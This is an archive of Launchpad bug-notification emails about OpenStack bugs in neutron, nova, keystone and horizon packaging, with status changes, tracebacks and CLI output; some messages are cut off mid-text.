neutron.pecan_wsgi.hooks.translation six.reraise(self.type_, self.value, self.tb) 2018-07
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Changed in: cloud-archive/queens Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Released Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1815844] Re: iscsi multipath dm-N device only used on first volume attachment
Marking charm task as invalid as this is a kernel issue with the xenial release kernel. Ubuntu/Linux bug task raised for further progression if updating to the latest HWE kernel on Xenial is not an option. ** Also affects: linux (Ubuntu) Importance: Undecided Status: New ** Changed in: charm-nova-compute Status: Triaged => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1815844 Title: iscsi multipath dm-N device only used on first volume attachment Status in OpenStack nova-compute charm: Invalid Status in OpenStack Compute (nova): Invalid Status in os-brick: Invalid Status in linux package in Ubuntu: New Bug description: With nova-compute from cloud:xenial-queens and use-multipath=true iscsi multipath is configured and the dm-N devices used on the first attachment but subsequent attachments only use a single path. The back-end storage is a Purestorage array. The multipath.conf is attached The issue is easily reproduced as shown below: jog@pnjostkinfr01:~⟫ openstack volume create pure2 --size 10 --type pure +-+--+ | Field | Value| +-+--+ | attachments | [] | | availability_zone | nova | | bootable| false| | consistencygroup_id | None | | created_at | 2019-02-13T23:07:40.00 | | description | None | | encrypted | False| | id | e286161b-e8e8-47b0-abe3-4df411993265 | | migration_status| None | | multiattach | False| | name| pure2| | properties | | | replication_status | None | | size| 10 | | snapshot_id | None | | source_volid| None | | status | creating | | type| pure | | updated_at | None | | user_id | c1fa4ae9a0b446f2ba64eebf92705d53 | +-+--+ jog@pnjostkinfr01:~⟫ openstack volume show pure2 ++--+ | Field | Value| ++--+ | attachments| [] | | availability_zone | nova | | bootable | false| | consistencygroup_id| None | | created_at | 2019-02-13T23:07:40.00 | | description| None | | encrypted | False| | id | e286161b-e8e8-47b0-abe3-4df411993265 | | migration_status | None | | multiattach| False| | name | pure2| | os-vol-host-attr:host | cinder@cinder-pure#cinder-pure | | os-vol-mig-status-attr:migstat | None | | os-vol-mig-status-attr:name_id | None | | os-vol-tenant-attr:tenant_id | 9be499fd1eee48dfb4dc6faf3cc0a1d7 | | properties | | | replication_status | None | | size | 10 | | snapshot_id| None | | source_volid | None | | status | available| | type | pure | | updated_at | 2019-02-13T23:07:41.00 | | user_id| c1fa4ae9a0b446f2ba64eebf92705d53 | ++--+ Add the volume to an instance: jog@pnjostkinfr01:
[Yahoo-eng-team] [Bug 1734204] Re: Insufficient free host memory pages available to allocate guest RAM with Open vSwitch DPDK in Newton
Picking this back up again - I'll fold the fix for the regression introduced by this change into the same SRU so it will consist of two patches. ** Changed in: nova (Ubuntu Bionic) Status: Won't Fix => Triaged ** Changed in: cloud-archive/queens Status: Won't Fix => Triaged ** Changed in: cloud-archive/queens Assignee: (unassigned) => James Page (james-page) ** Changed in: nova (Ubuntu Bionic) Assignee: (unassigned) => James Page (james-page) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1734204 Title: Insufficient free host memory pages available to allocate guest RAM with Open vSwitch DPDK in Newton Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive queens series: Triaged Status in OpenStack Compute (nova): Fix Released Status in nova package in Ubuntu: Invalid Status in nova source package in Bionic: Triaged Bug description: When spawning an instance and scheduling it onto a compute node which still has sufficient pCPUs for the instance and also sufficient free huge pages for the instance memory, nova returns: Raw [stack@undercloud-4 ~]$ nova show 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc (...) | fault| {"message": "Exceeded maximum number of retries. Exceeded max scheduling attempts 3 for instance 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc. Last exception: internal error: process exited while connecting to monitor: 2017-11-23T19:53:20.311446Z qemu-kvm: -chardev pty,id=cha", "code": 500, "details": " File \"/usr/lib/python2.7/site-packages/nova/conductor/manager.py\", line 492, in build_instances | | | filter_properties, instances[0].uuid) | | | File \"/usr/lib/python2.7/site-packages/nova/scheduler/utils.py\", line 184, in populate_retry | | | raise exception.MaxRetriesExceeded(reason=msg) | | | ", "created": "2017-11-23T19:53:22Z"} (...) And /var/log/nova/nova-compute.log on the compute node gives the following ERROR message: Raw 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [req-2ad59cdf-4901-4df1-8bd7-ebaea20b9361 5d1785ee87294a6fad5e2b91cc20 8c307c08d2234b339c504bfdd896c13e - - -] [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] Instance failed to spawn 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] Traceback (most recent call last): 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] File "/usr/lib/python2.7/site-packages/nova/compute/manager.py", line 2087, in _build_resources 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] yield resources 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] File "/usr/lib/python2.7/site-packages/nova/compute/manager.py", line 1928, in _build_and_run_instance 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] block_device_info=block_device_info) 2017-11-23 19:53:21.021 153615 ERROR nova.compute.manager [instance: 1b72e7a1-c298-4c92-8d2c-0a9fe886e9bc] File "/usr/lib/python2.7/site-packages/nova/virt/libvirt
[Yahoo-eng-team] [Bug 1859844] Re: Impossible to rename the Default domain id to the string 'default.'
** Changed in: charm-keystone Status: Invalid => New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1859844 Title: Impossible to rename the Default domain id to the string 'default.' Status in OpenStack keystone charm: New Status in OpenStack Identity (keystone): Invalid Status in keystone package in Ubuntu: Invalid Bug description: Openstack version = Rocky When changing the 'default_domain_id' variable to the string 'default' and changing all references for this variable in the keystone database we get the following error in keystone.log: (keystone.common.wsgi): 2020-01-15 14:16:37,869 ERROR badly formed hexadecimal UUID string Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/python3/dist-packages/keystone/common/manager.py", line 116, in wrapped __ret_val = __f(*args, **kwargs) File "/usr/lib/python3/dist-packages/keystone/token/provider.py", line 251, in issue_token token_id, issued_at = self.driver.generate_id_and_issued_at(token) File "/usr/lib/python3/dist-packages/keystone/token/providers/fernet/core.py", line 61, in generate_id_and_issued_at app_cred_id=token.application_credential_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 159, in create_token protocol_id, access_token_id, app_cred_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 444, in assemble b_domain_id = cls.convert_uuid_hex_to_bytes(domain_id) File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 290, in convert_uuid_hex_to_bytes uuid_obj = uuid.UUID(uuid_string) File "/usr/lib/python3.6/uuid.py", line 140, in __init__ raise ValueError('badly formed hexadecimal UUID string') ValueError: badly formed hexadecimal UUID string (keystone.common.wsgi): 2020-01-15 14:16:38,908 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:39,058 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:50,838 WARNING You are not authorized to perform the requested action: identity:list_projects. (keystone.common.wsgi): 2020-01-15 14:16:54,086 WARNING You are not authorized to perform the requested action: identity:list_projects. This change is needed to integrate keystone to ICO (IBM Cloud Orchestrator) To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/1859844/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1862343] Re: Changing the language in GUI has almost no effect
Packages have PO files but not MO files - the package build does the compilation but the install step completely misses them. ** Changed in: horizon (Ubuntu) Status: New => Triaged ** Changed in: horizon (Ubuntu) Importance: Undecided => High ** Also affects: horizon (Ubuntu Eoan) Importance: Undecided Status: New ** Also affects: horizon (Ubuntu Focal) Importance: High Status: Triaged ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/ussuri Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Changed in: horizon (Ubuntu Eoan) Importance: Undecided => High ** Summary changed: - Changing the language in GUI has almost no effect + compiled messages not shipped in packaging resulting in missing translations -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1862343 Title: compiled messages not shipped in packaging resulting in missing translations Status in OpenStack openstack-dashboard charm: Invalid Status in Ubuntu Cloud Archive: New Status in Ubuntu Cloud Archive rocky series: New Status in Ubuntu Cloud Archive stein series: New Status in Ubuntu Cloud Archive train series: New Status in Ubuntu Cloud Archive ussuri series: New Status in OpenStack Dashboard (Horizon): Invalid Status in horizon package in Ubuntu: Triaged Status in horizon source package in Eoan: New Status in horizon source package in Focal: Triaged Bug description: I changed the language in GUI to French but interface stays mostly English. Just a few strings are displayed in French, e.g.: - "Password" ("Mot de passe") on the login screen, - units "GB", "TB" as "Gio" and "Tio" in Compute Overview, - "New password" ("Noveau mot de passe") in User Settings. All other strings are in English. See screenshots attached. This is the Stein on Ubuntu Bionic deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-openstack-dashboard/+bug/1862343/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1862343] Re: Changing the language in GUI has almost no effect
it looks like the translation compilation never happens - if you drop into /usr/share/openstack-dashboard and run: sudo python3 manage.py compilemessages and then restart apache the translations appear to be OK ** Also affects: horizon (Ubuntu) Importance: Undecided Status: New ** Changed in: charm-openstack-dashboard Status: New => Invalid ** Changed in: horizon Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Dashboard (Horizon). https://bugs.launchpad.net/bugs/1862343 Title: Changing the language in GUI has almost no effect Status in OpenStack openstack-dashboard charm: Invalid Status in OpenStack Dashboard (Horizon): Invalid Status in horizon package in Ubuntu: New Bug description: I changed the language in GUI to French but interface stays mostly English. Just a few strings are displayed in French, e.g.: - "Password" ("Mot de passe") on the login screen, - units "GB", "TB" as "Gio" and "Tio" in Compute Overview, - "New password" ("Noveau mot de passe") in User Settings. All other strings are in English. See screenshots attached. This is the Stein on Ubuntu Bionic deployment. To manage notifications about this bug go to: https://bugs.launchpad.net/charm-openstack-dashboard/+bug/1862343/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
** Changed in: cloud-archive/stein Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Won't Fix Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Disco: Won't Fix Status in neutron-fwaas source package in Eoan: Fix Released Bug description: [Impact] Unable to associate ports with a firewall under FWaaS v2 [Test Case] Deploy OpenStack (stein or Later) using Charms Create firewall policy, apply to router - failure as unable to associate port with policy in underlying DB [Regression Potential] Medium; the proposed fix has not been accepted upstream as yet (discussion ongoing due to change of database migrations). [Original Bug Report] Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a tab
[Yahoo-eng-team] [Bug 1859844] Re: Impossible to rename the Default domain id to the string 'default.'
FTR charm has written the UUID to the configuration file for the last 3 years: https://opendev.org/openstack/charm-keystone/commit/ccf15398 ** Also affects: keystone (Ubuntu) Importance: Undecided Status: New ** Changed in: keystone Status: Incomplete => Invalid ** Also affects: charm-keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1859844 Title: Impossible to rename the Default domain id to the string 'default.' Status in OpenStack keystone charm: New Status in OpenStack Identity (keystone): Invalid Status in keystone package in Ubuntu: New Bug description: Openstack version = Rocky When changing the 'default_domain_id' variable to the string 'default' and changing all references for this variable in the keystone database we get the following error in keystone.log: (keystone.common.wsgi): 2020-01-15 14:16:37,869 ERROR badly formed hexadecimal UUID string Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/python3/dist-packages/keystone/common/manager.py", line 116, in wrapped __ret_val = __f(*args, **kwargs) File "/usr/lib/python3/dist-packages/keystone/token/provider.py", line 251, in issue_token token_id, issued_at = self.driver.generate_id_and_issued_at(token) File "/usr/lib/python3/dist-packages/keystone/token/providers/fernet/core.py", line 61, in generate_id_and_issued_at app_cred_id=token.application_credential_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 159, in create_token protocol_id, access_token_id, app_cred_id File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 444, in assemble b_domain_id = cls.convert_uuid_hex_to_bytes(domain_id) File "/usr/lib/python3/dist-packages/keystone/token/token_formatters.py", line 290, in convert_uuid_hex_to_bytes uuid_obj = uuid.UUID(uuid_string) File "/usr/lib/python3.6/uuid.py", line 140, in __init__ raise ValueError('badly formed hexadecimal UUID string') ValueError: badly formed hexadecimal UUID string (keystone.common.wsgi): 2020-01-15 14:16:38,908 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:39,058 WARNING You are not authorized to perform the requested action: identity:get_domain. (keystone.common.wsgi): 2020-01-15 14:16:50,838 WARNING You are not authorized to perform the requested action: identity:list_projects. (keystone.common.wsgi): 2020-01-15 14:16:54,086 WARNING You are not authorized to perform the requested action: identity:list_projects. This change is needed to integrate keystone to ICO (IBM Cloud Orchestrator) To manage notifications about this bug go to: https://bugs.launchpad.net/charm-keystone/+bug/1859844/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
** Description changed: - Impacts both Stein and Rocky (although rocky does not enable v2 just - yet). + [Impact] + Unable to associate ports with a firewall under FWaaS v2 + + [Test Case] + Deploy OpenStack (stein or Later) using Charms + Create firewall policy, apply to router - failure as unable to associate port with policy in underlying DB + + [Regression Potential] + Medium; the proposed fix has not been accepted upstream as yet (discussion ongoing due to change of database migrations). + + [Original Bug Report] + Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1018, in _read_packet 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters packet.check_error() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 384, in check_error 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters err.raise_mysql_exception(self._data) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/err.py", line 107, in raise_mysql_exception 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters raise errorclass(errno, errval) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: neutron-server 2:14.0.0-0ubuntu1.1~cloud0 [origin: Canonical] ProcVersionSignature: Ubuntu 4.15.0-51.55-generic 4.15.18 Uname: Linux 4.15.0-51-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.6 Architecture: amd64 CrashDB: Â { "impl": "launchpad", "project": "cloud-archive", "bug_pattern_url": "http://people.canonical.com/~ubuntu-archive/bugpatt
[Yahoo-eng-team] [Bug 1831986] Re: fwaas_v2 - unable to associate port with firewall (PXC strict mode)
This bug was fixed in the package neutron-fwaas - 1:15.0.0~rc1-0ubuntu3~cloud0 --- neutron-fwaas (1:15.0.0~rc1-0ubuntu3~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron-fwaas (1:15.0.0~rc1-0ubuntu3) eoan; urgency=medium . * d/p/add-missing-pk-firewall-group-associations-v2.patch: Cherry pick fix to resolve issue with missing primary key on firewall_group_associations_v2 table (LP: #1831986). ** Changed in: cloud-archive Status: Triaged => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1831986 Title: fwaas_v2 - unable to associate port with firewall (PXC strict mode) Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: In Progress Status in neutron-fwaas package in Ubuntu: Fix Released Status in neutron-fwaas source package in Disco: Triaged Status in neutron-fwaas source package in Eoan: Fix Released Bug description: Impacts both Stein and Rocky (although rocky does not enable v2 just yet). 542 a9761fa9124740028d0c1d70ff7aa542] DBAPIError exception wrapped from (pymysql.err.InternalError) (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') [SQL: 'DELETE FROM firewall_group_port_associations_v2 WHERE firewall_group_port_associations_v2.firewall_group_id = %(firewall_group_id_1)s'] [parameters: {'firewall_group_id_1': '85a277d0-ebaf-4a5d-9d45-6a74b8f54372'}] (Background on this error at: http://sqlalche.me/e/2j85): pymysql.err.InternalError: (1105, 'Percona-XtraDB-Cluster prohibits use of DML command on a table (neutron.firewall_group_port_associations_v2) without an explicit primary key with pxc_strict_mode = ENFORCING or MASTER') 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters Traceback (most recent call last): 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/base.py", line 1193, in _execute_context 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters context) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/sqlalchemy/engine/default.py", line 509, in do_execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters cursor.execute(statement, parameters) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 165, in execute 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result = self._query(query) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/cursors.py", line 321, in _query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters conn.query(q) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 860, in query 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters self._affected_rows = self._read_query_result(unbuffered=unbuffered) 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1061, in _read_query_result 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters result.read() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File "/usr/lib/python3/dist-packages/pymysql/connections.py", line 1349, in read 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters first_packet = self.connection._read_packet() 2019-06-07 10:07:50.937 30837 ERROR oslo_db.sqlalchemy.exc_filters File 